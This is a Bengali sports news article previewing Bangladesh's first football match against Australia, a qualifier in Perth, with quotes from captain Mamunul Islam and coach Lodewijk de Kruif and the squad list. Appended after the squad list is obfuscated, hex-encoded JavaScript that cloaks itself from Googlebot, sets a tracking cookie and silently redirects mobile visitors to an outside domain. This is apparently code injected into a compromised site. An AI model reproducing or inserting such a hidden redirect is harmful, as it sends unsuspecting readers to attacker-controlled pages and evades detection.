অস্ট্রেলিয়ার বিপক্ষে চাপহীন বাংলাদেশ !

5
নিজস্ব প্রতিবেদক : প্রতিপক্ষ অস্ট্রেলিয়া। হোক সেটা ফুটবল, ক্রিকেট, হকি কিংবা অন্য কোনো খেলায়। সে ম্যাচ ঘিরে অন্যরকম এক রোমাঞ্চই কাজ করবে বাংলাদেশের খেলোয়াড়দের মধ্যে। দ্বিপাক্ষিক, টুর্নামেন্ট কিংবা বিশ্বকাপ-সব কিছু মিলিয়ে ক্রিকেটে দুই দেশের সাক্ষাত এখন নতুন কিছু নেই। ক্রিকেটের এ পরাশক্তির বিপক্ষে বাংলাদেশের জয়ের স্বাদও যে নেয়া হয়ে গেছে। কিন্তু ফুটবলে? মাঠের মোকাবিলাটাই যে হয়ে উঠেনি। দীর্ঘ সে অপেক্ষার অবসান হতে যাচ্ছে সহসাই-আগামী ৩ সেপ্টেম্বর পার্থে ফুটবলে বাংলাদেশ-অস্ট্রেলিয়া প্রথম সাক্ষাত। তাও আবার বিশ্বকাপ এবং এশিয়ান কাপের মতো বড় আসরের বাছাই পর্বে। অস্ট্রেলিয়া বিশ্বকাপ মঞ্চে পা দিয়েছে একাধিকবার। এশিয়ার কাপের বর্তমান চ্যাম্পিয়নও তারা। সকারুসদের বিপক্ষে ম্যাচের সময়টা এগিয়ে আসার সাথে বাংলাদেশ শিবিরেতো দুশ্চিন্তাটাই বেশি ভর করার কথা। কিন্তু বাস্তবতা হলো লাল-সবুজ জার্সিধারীদের মধ্যে তা নেই। আগামীকাল (বুধবার) রাতে ঐতিহাসিক এ ম্যাচটি খেলতে বাংলাদেশ দল ঢাকা ছাড়ছে। যাওয়ার আগে অধিনায়ক মামুনুল ইসলামসহ খেলোয়াড়দের চোখে-মুখের দুশ্চিন্তাটা খুঁজেও পাওয়া গেলো না। সব কিছু ছাপিয়ে সবার মুখে একটাই কথা-আহ্ অস্ট্রেলিয়ার বিপক্ষে ম্যাচ। ঘুড়ে ফিরে ওই রোমাঞ্চই বারবার ঘিরে ফেলছে ফুটবলারদের হৃদয়-মন। তার মানে কি অস্ট্রেলিয়াকে নিয়ে মাঠের কোনো চিন্তাই নেই লোডভিক ডি ক্রুইফের শিষদের। অস্ট্রেলিয়া এশিয়ার পরাশক্তি। বিশ্ব ফুটবলেও যাদের পদচারণা গৌরব-গাঁথা। এমন শক্তিধর দলটির বিপক্ষে মাঠে নামার আগে কোনো চাপতো থাকার কথা নয় বাংলাদেশের। এ ম্যাচে যে কিছুই হারানোর নেই দক্ষিণ এশিয়ার দেশটির। তাইতো চাপমুক্ত হয়েই অস্ট্রেলিয়ার মোকাবিলা করবে বাংলাদেশ। এ ম্যাচ থেকে বাংলাদেশের পাওয়া একটাই-অস্ট্রেলিয়ার বিপক্ষে খেলার অভিজ্ঞতা।
অস্ট্রেলিয়ার ফিফা র‌্যাঙ্কিং ৬১, বাংলাদেশের ১৭০। এমন দুটি দলের লড়াইতো একপেশে হবেই। তবে খেলাটি যেহেতু ‘সব সম্ভবের, ফুটবল-একটা ভালো লড়াইতো হতেও পারে। র‌্যাংঙ্কিংয়ে অস্ট্রেলিয়ার চেয়ে ১০৯ ধাপ পিছিয়ে বাংলাদেশ। র‌্যাংঙ্কিংই বুঝিয়ে দিচ্ছে দুই দলের মধ্যে শক্তির ফারাকটা। শক্তির এ দূরত্বটাই চাপমুক্ত রাখছে বাংলাদেশকে। জীবনের সেরা ম্যাচ ধরে নিয়েই মাঠে নামবে মামুনুলবাহিনী। অস্ট্রেলিয়াকে মোকাবেলা করার আগে মালয়েশিয়া জাতীয় ফুটবল দলের বিপক্ষে তাদেরই মাটিতে ২৯ আগস্ট একটি প্রস্তুতি ম্যাচ খেলবে বাংলাদেশ। তাইতো একটু আগেভাগে ফুটবলারদের দেশ ত্যাগ করা।
সবদিক থেকেই এগিয়ে থাকা অস্ট্রেলিয়াকে সমীহ করলেও তাদের ভয় পাচ্ছে না বাংলাদশ। আজ (মঙ্গলবার) বাংলাদশে ফুটবল ফেডারেশনের (বাফুফে) ভবনের কনফারেন্স রুমে অনুষ্ঠিত এক সংবাদ সম্মেলনে নিজেদের লক্ষ্য জানিয়েছেন মামুনুল ইসলাম, ‘এটা আমাদের জন্য অনকে বড় ম্যাচ। আগামী ১০-১৫ বছরের মধ্যে তাদের (অস্ট্রেলিয়া) সঙ্গে আমাদের খেলা হবে কিনা কে জানে, কিন্তু এই ম্যাচে আমাদের সেরাটা দেওয়ার চেষ্টা থাকবে। তাদেরকে নিয়ে আমাদের কেউ ভীত না। ইউটউিবে কিরগিজস্তান-অস্ট্রেলিয়া ম্যাচ দেখেছি। ওদের খেলোয়াড়দের পর্যবেক্ষণ করেছি। ওদের নিয়ে পরিকল্পনা করে ফেলেছি। আমাদের জীবনের সর্বোচ্চ চেষ্টা করতে হবে।’
মালয়েশিয়ার বিপক্ষে প্রীতি ম্যাচ সম্পর্কে মামুনুর বলেন, ‘অস্ট্রেলিয়ার বিপক্ষে যে কৌশলে খেলব, একই কৌশলে আমরা মালয়শিয়ার বিপক্ষেও খেলব। যদি এই কৌশলে মালয়েশিয়াকে হারাতে পারি, তাহলে আমাদের আত্মবিশ্বাস বাড়বে। তাই ম্যাচটি আমাদের জন্য খুবই গুরুত্বর্পূণ। বাফুফকে ধন্যবাদ আমাদের এই প্রস্ততি ম্যাচটা খেলতে দেয়ার ব্যবস্থা করে দেয়ার জন্য। এই ম্যাচটা খেলার পরই আমরা নিজেদের পরিকল্পনাটা আরও ভালভাবে গোছাবো।’
বাছাই পর্বে ‘বি’ গ্রুপে গত দুই ম্যাচে নিজেদের মাঠে কিরগিজিস্তানরে বিপক্ষে ৩-১ গোলে হারের পর তাজিকিস্তানরে সঙ্গে ১-১ গোলে ড্র করে বাংলাদেশ। বাছাইপর্বে নিজেদেরে প্রথম ম্যাচে কিরগিজস্তানকে ২-১ গোলে হারায় অস্ট্রেলিয়া।
দলের ডাচ্ কোচ লোডভিক ডি ক্রুইফ বলেন, ‘আমি খুশি। দলের সবাই আগামী তিনটি ম্যাচের জন্য প্রস্তুত। মালয়েশিয়ার পর আমাদের বড় পরীক্ষা অস্ট্রেলিয়া। অস্ট্রেলিয়া সম্পর্কে তো কারো অজানা নয়। তাদের দলের অনেক খেলোয়াড় ইউরোপে লীগে খেলে। তবে ওই ম্যাচের পর বাংলাদেশে জর্দানের সঙ্গে ম্যাচ। যেখানে আমাদের সুযোগটা আরও বেশি। অস্ট্রেলিয়ার ম্যাচটা আমাদের জন্য বড় চ্যালেঞ্জ। ছেলেরা সেই চ্যালেঞ্জ গ্রহণ করতে প্রস্তত আছে। ফুটবলে যেকোন কিছুই সম্ভব। আমার ছেলেদের শতভাগ অনুপ্রাণিত করেছি। অস্ট্রেলিয়া একটি হাই প্রোফাইল খেলোয়াড়দের নিয়ে গড়া দল। তাদের সঙ্গে আমরা জিতলেও খুশি, ড্র করলেও খুশি, হারলেও অখুশি হবো না।’
বাংলাদেশ দলের দুর্বলতা সেটপিস নিয়েই বেশি কাজ করেছেন ক্রুইফ। কাজ করেছেন রক্ষণভাগ নিয়েও। অস্ট্রেলিয়ার মতো দলের বিপক্ষে কাউন্টার এ্যাটাকে যেতে হয়তো কয়েক সেকেন্ড সময় পাবে বাংলাদেশ। সেটিও মাথায় রেখেছেন ক্রুইফ। অস্ট্রেলিয়ার সঙ্গে ম্যাচে ডাগআউটে থাকতে পারবেন না ক্রুইফ ফিফার নিষেধাজ্ঞার জন্য। তবে তাতে বিশেষ কোন অসুবিধা হবে না বলেই ক্রুইফের বিশ্বাস।

বাংলাদেশ স্কোয়াড
গোলরক্ষক : রাসেল মাহমুদ লিটন, আশরাফুল ইসলাম রানা, শহীদুল আলম সোহেল; রক্ষণভাগ : নাসির উদ্দিন চৌধুরী, ইয়ামিন মুন্না, রায়হান হাসান, ইয়াসিন খান, আতিকুর রহমান মিশু, নাসিরুল ইসলাম নাসির, তপু বর্মণ, মোহাম্মদ লিঙ্কন; মধ্যমাঠ : জামাল ভুঁইয়া, মামুনুল ইসলাম, সোহেল রানা, ইমন বাবু, হেমন্ত ভিনসেন্ট বিশ্বাস, জুয়েল রানা, জাহিদ হোসেন, মোনায়েম খান রাজু; আক্রমণভাগ : তকলিস আহমেদ, জাহিদ হাসান এমিলি, এনামুল হক ও আবদুল বাতেন কোমল।var _0x446d=[“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}